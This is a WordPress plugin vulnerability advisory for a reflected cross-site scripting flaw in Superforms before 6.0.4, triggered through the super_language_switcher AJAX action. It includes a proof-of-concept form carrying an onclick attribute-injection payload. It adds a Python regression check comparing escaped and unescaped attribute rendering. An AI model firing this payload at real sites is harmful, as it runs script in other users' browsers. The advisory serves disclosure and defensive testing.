WordPress Plugin Vulnerabilities

Superforms < 6.0.4 - Reflected Cross-Site Scripting

Description

The plugin does not escape the bob_czy_panstwa_sprawa_zostala_rozwiazana parameter before outputting it back in an attribute via the super_language_switcher AJAX action, leading to Reflected Cross-Site Scripting. The action also lacks CSRF protection, making the attack easier to perform against any user.

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="super_language_switcher" />
      <input type="hidden" name="form_id" value="1030" />
      <input type="hidden" name="i18n" value="pl_PL" />
      <input type="hidden" name="parameters[bob_co_mozemy_poprawic_aby_panstwa_ocena_byla_wyzsza]" value="555" />
      <input type="hidden" name="parameters[bob_co_sprawilo_taka_ocene_zaangazowania_konsultanta]" value="555" />
      <input type="hidden" name="parameters[bob_czy_konsultant_wytlumaczyl_dlaczego_nie_jest_w_stanie_rozwiazac_sprawy]" value="1" />
      <input type="hidden" name="parameters[bob_czy_panstwa_sprawa_zostala_rozwiazana]" value=" accesskey accesskey=x onclick=alert(document.domain) id=test" />
      <input type="hidden" name="parameters[bob_dlaczego_panstwa_zdaniem_nie_udalo_sie_rozwiazac_problemu]" value="555" />
      <input type="hidden" name="parameters[bob_jak_duzo_wysilku_wlozyles_w_zalatwienie_konkretnej_sprawy]" value="1" />
      <input type="hidden" name="parameters[bob_jakie_czynniki_mozemy_poprawic_aby_panstwa_ocena_byla_wyzsza]" value="555" />
      <input type="hidden" name="parameters[bob_na_koniec_prosimy_o_podsumowanie_panstwa_oceny_oraz_napisanie_sugestii_i_uag_dotyczacych_obslugi]" value="555" />
      <input type="hidden" name="parameters[bob_na_podstawie_ostatniej_rozmowy_z_naszym_konsultantem_ocen_w_skali_zaangazowanie_w_rozwiazanie_problemu]" value="1" />
      <input type="hidden" name="parameters[bob_w_jakim_stopniu_sa_panstwo_zadowoleni_z_obslugi_konsultanta]" value="1" />
      <input type="hidden" name="parameters[hidden_form_id]" value="1030" />
      <input type="hidden" name="parameters[id]" value="1" />
      <input type="hidden" name="parameters[super_ajax_nonce]" value="" />
      <input type="hidden" name="parameters[super_hp]" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
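
Added example (not the plugin's code and not part of the original advisory): a regression check that renders the reflected value into an attribute four ways and parses the result to see whether extra attributes such as onclick appear. The templates are hypothetical because the plugin's real markup is not shown here, and the quoted variant of the payload is constructed; the safe combination corresponds to calling WordPress's esc_attr() inside a quoted attribute.

```python
from html import escape
from html.parser import HTMLParser

# Value of the vulnerable parameter, copied from the proof of concept above.
POC_VALUE = " accesskey accesskey=x onclick=alert(document.domain) id=test"
# Constructed variant that first closes a double-quoted attribute.
QUOTED_VARIANT = '"' + POC_VALUE

# Hypothetical templates: the plugin's real markup is not shown on this page.
RENDERERS = {
    "unquoted, raw": lambda v: "<input name=field value=%s>" % v,
    "unquoted, escaped": lambda v: "<input name=field value=%s>" % escape(v, quote=True),
    "quoted, raw": lambda v: '<input name="field" value="%s">' % v,
    "quoted, escaped": lambda v: '<input name="field" value="%s">' % escape(v, quote=True),
}


class _AttrCollector(HTMLParser):
    """Collects every attribute name the parser sees on start tags."""

    def __init__(self):
        super().__init__()
        self.names = []

    def handle_starttag(self, tag, attrs):
        self.names.extend(name for name, _ in attrs)


def injected_attributes(markup, expected=("name", "value")):
    """Return attribute names in the parsed markup that the template never intended."""
    parser = _AttrCollector()
    parser.feed(markup)
    parser.close()
    return [n for n in parser.names if n not in expected]


def audit(value):
    """Map each rendering strategy to the attributes the value managed to inject."""
    return {label: injected_attributes(render(value)) for label, render in RENDERERS.items()}


if __name__ == "__main__":
    for sample in (POC_VALUE, QUOTED_VARIANT):
        print(repr(sample))
        for label, extra in audit(sample).items():
            print("  %-18s -> %s" % (label, extra or "no injected attributes"))
```

Escaping alone does not help when the attribute is unquoted, because the payload on this page contains no characters that HTML escaping touches; only the quoted and escaped rendering is clean for both samples.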

Affects Plugins

Fixed in 6.0.4

Classification

Type
XSS
CWE

Miscellaneous

Original Researcher
Koutrouss Naddara
Submitter
Koutrouss Naddara
Verified
Yes

Timeline

Publicly Published
2022-01-31
Added
2022-01-31
Last Updated
2022-04-13